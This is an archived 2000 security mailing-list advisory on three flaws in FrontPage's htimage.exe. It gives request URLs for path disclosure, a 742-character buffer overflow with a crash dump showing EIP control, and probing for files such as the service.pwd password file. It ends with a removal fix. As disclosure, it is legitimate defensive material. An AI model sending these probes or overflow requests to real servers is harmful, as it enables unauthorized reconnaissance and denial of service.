|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: More vulnerabilities in FP
From: Narrow (narrow
HOBBITON.ORG)Date: Wed Apr 19 2000 - 12:15:54 CDT
- Next message: Ussr Labs: "Remote DoS attack in Real Networks Real Server Vulnerability"
- Previous message: eAX [Teelicht]: "AVM Ken! + Statement"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[ Reader(s), please CC your comments/etc to narrowhobbiton.org ]
Hello,
I'm not on the list, but a person suggested me to send my advisory here,
attached.
Thank you,
Narrow
-------[ Legion2000 - Russian Security Team (ADV-150400#1) ]-------
www.legion2000.cc
---- INFORMATION ----
Program Name : CERN Image Map Dispatcher
Discovered By : Narrow (narrowhobbiton.org)
---------------------
Problem Description
~~~~~~~~~~~~~~~~~~~
CERN Image Map Dispatcher (/cgi-bin/htimage.exe) comes by default with FrontPage. I found three bugs
in "htimage.exe": 1) Gives us the full path to the root directory 2) Simple buffer overflow 3) Allow
us to access files.
Problem #1
~~~~~~~~~~
Like I said, the first bug gives us the full path to the root directory. I tested this vulnerability
against some servers, all where vulnerable!
Tested / Vulnerable FP Servers: 3.0.2.926 (FrontPage'98), 3.0.2.1706, 4.0.2.2717, 2.0.1.927, 3.0.2.926,
3.0.2.1105, 3.0.2.1330, 3.0.2.1117 (All Windows based web servers are vulnerable if we have premission
to execute "htimage.exe" + If "htimage.exe" exist).
To test this vulnerability we need "htimage.exe" in our "cgi-bin" directory (it's installed by default)
and premission to execute it. That's why only Windows is vulnerable, Unix based systems can't execute
"*.exe" files.
If we access "htimage.exe" using our favorite web browser like: http://server/cgi-bin/htimage.exe/linux?0,0
we get this error:
------------------------------------------------------------------------------------
Error
Error calling HTImage:
Picture config file not found, tried the following:
q:/hidden_directory_because_of_the_script_kiddies/webroot/linux
/linux
------------------------------------------------------------------------------------
Now we know that the path to the root directory is "q:/hidden_directory_because_of_the_script_kiddies/webroot/".
Problem #2
~~~~~~~~~~
Like I said, simple buffer overflow. Tested against "Microsoft-PWS-95/2.0" and "FrontPage-PWS32".
Tested / Vulnerable OS: Windows'95/98
"htimage.exe" buffer overflows if we access it like: http://server/cgi-bin/htimage.exe/<742 A's>?0,0.
------------------------------------------------------------------------------------
HTIMAGE caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
0EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246
EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4
ECX=0054015c DS=013f ESI=005401a0 FS=3467
EDX=bff76648 ES=013f EDI=00540184 GS=0000
Bytes at CS:EIP:
Stack dump:
bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28
0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c
------------------------------------------------------------------------------------
<Server still running> + <500 Server Error>
First remote FrontPage exploit?
Problem #3
~~~~~~~~~~
It's not a serious bug. Using "htimage.exe" we can access files on server, but
we can't read them. Accessing "htimage.exe" like: http://server/cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0
outputs:
------------------------------------------------------------------------------------
Error
Error calling HTImage:
HTImage.c: Syntax error at line 1 Bad field name, expecting 'default', 'rectangle', 'circle' or
'polygon' (got an alphanumeric string)
------------------------------------------------------------------------------------
NOTE: Accessing "/_vti_pvt/service.pwd" outputs : 403 Forbidden
The Cyberiad <cyberiadcyberus.ca> adds:
------------------------------------------------------------------------------------
For example, if your webroot is at d:\Inetpub\wwwroot, the request,
http://server/cgi-bin/htimage.exe/test.doc?0,0
will test for the existence of a file d:\test.doc. Note however, that
"htimage.exe" checks for the file d:\Inetpub\wwwroot\test.doc first and
then d:\test.doc. It does not allow me to test for file existence on
other volumes.
------------------------------------------------------------------------------------
Solution
~~~~~~~~
1) Remove "htimage.exe".
2) Do not use FrontPage, simple enough :)
Comments
~~~~~~~~
Sorry for my bad english, not my mother/father language ;)
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net
- Next message: Ussr Labs: "Remote DoS attack in Real Networks Real Server Vulnerability"
- Previous message: eAX [Teelicht]: "AVM Ken! + Statement"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]